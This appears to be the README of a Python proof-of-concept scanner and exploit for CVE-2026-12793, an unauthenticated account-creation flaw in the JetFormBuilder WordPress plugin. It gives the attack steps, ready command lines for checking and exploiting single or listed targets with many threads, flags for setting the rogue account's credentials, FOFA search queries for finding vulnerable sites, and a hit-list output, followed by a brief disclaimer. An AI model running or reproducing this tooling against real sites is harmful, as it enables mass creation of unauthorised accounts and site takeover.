
Python PoC scanner and exploit for CVE-2026-12793, an unauthenticated privilege escalation in JetFormBuilder <=3.6.2 that creates WordPress admin accounts.
Proof-of-concept scanner and exploit for CVE-2026-12793 in the WordPress plugin JetFormBuilder — Dynamic Blocks Form Builder (Crocoblock).
| CVE | CVE-2026-12793 |
| Plugin | jetformbuilder |
| Affected | ≤ 3.6.2 |
| Fixed in | 3.6.2.1+ |
| CVSS | 9.8 Critical |
| Auth | Unauthenticated |
| CWE | CWE-269 — Improper Privilege Management |
| Researcher | daroo (Wordfence) |
The plugin does not verify that _jet_engine_booking_form_id refers to a published jet-form-builder custom post type before loading the referenced post's block content as form schema and executing post-submit actions.
An unauthenticated attacker can submit a crafted AJAX request to trigger the Register User action (wp_insert_user) and create a new WordPress account. If the target form is misconfigured with an elevated role (e.g. administrator), this leads to full site takeover.
1. Detect JetFormBuilder + version ≤ 3.6.2 (readme.txt)
2. Discover form ID from public pages (data-form-id, /register/, etc.)
3. POST to referer page with ?jet_form_builder_submit=submit&method=ajax
4. Register User action runs → new WP user created
Block_Helper::is_valid_form_post() — only published jet-form-builder CPT acceptedForm_Handler::set_form_id() rejects invalid form IDswp_insert_user / wp_update_user blocked as callbacks)requestspip install requests urllib3
python poc.py -u https://target.example --mode check
python poc.py --list domains.txt --mode check --threads 30 --quiet
Input formats: one domain/URL per line, FOFA CSV (host,domain), or candidates.jsonl from a previous run.
python poc.py -u https://target.example --mode exploit \
--form-id 1858 \
--page-url /register/ \
--fields login=cadastro_nome,email=cadastro_mail,password=cadastro_senha \
--username myuser \
--email [email protected] \
--password 'SecurePass123!' \
--verify
python poc.py --list candidates.jsonl --mode exploit --threads 10 --verify
| Flag | Description |
|---|---|
-u, --url | Single target URL |
--list | Target list file |
--mode | check (default) or exploit |
--form-id | Known JetFormBuilder form post ID |
--page-url | Page embedding the form (referer), e.g. /register/ |
--fields | Field map: login=x,email=y,password=z |
--paths | Extra paths to crawl for forms |
--username / --email / --password | Credentials for exploit (random if omitted) |
--verify | Verify account via wp-login.php after submit |
-j, --threads | Worker threads (default: 20) |
--timeout | HTTP timeout in seconds (default: 20) |
--proxy | HTTP(S) proxy URL |
--output | Full JSONL log (default: cve_2026_12793_results.jsonl) |
--vuln-list | Hit list (default: hits.txt) |
--candidates-list | Candidate JSONL (default: candidates.jsonl) |
-q, --quiet | Progress output only |
| File | Content |
|---|---|
hits.txt | Vulnerable / exploited target URLs |
candidates.jsonl | Targets with reachable Register User probe (form_id, page_url, fields) |
cve_2026_12793_results.jsonl | Full per-target JSON results |
{
"target": "https://target.example",
"version": "3.3.3",
"form_id": 1858,
"page_url": "https://target.example/register/",
"fields": {
"login": "user_login",
"email": "user_email",
"password": "user_pass"
}
}
Auto-detected field names are heuristic. Always verify and override with
--fieldsbefore exploit.
body="/wp-content/plugins/jetformbuilder/"
body="jet-form-builder" && body="wp-content"
header="/wp-content/plugins/jetformbuilder/"
title="WordPress" && body="data-form-id"
Version check:
/wp-content/plugins/jetformbuilder/readme.txt
Look for Stable tag: ≤ 3.6.2.
This tool is provided for authorized security testing and educational purposes only. Unauthorized access to computer systems is illegal. The authors assume no liability for misuse.
MIT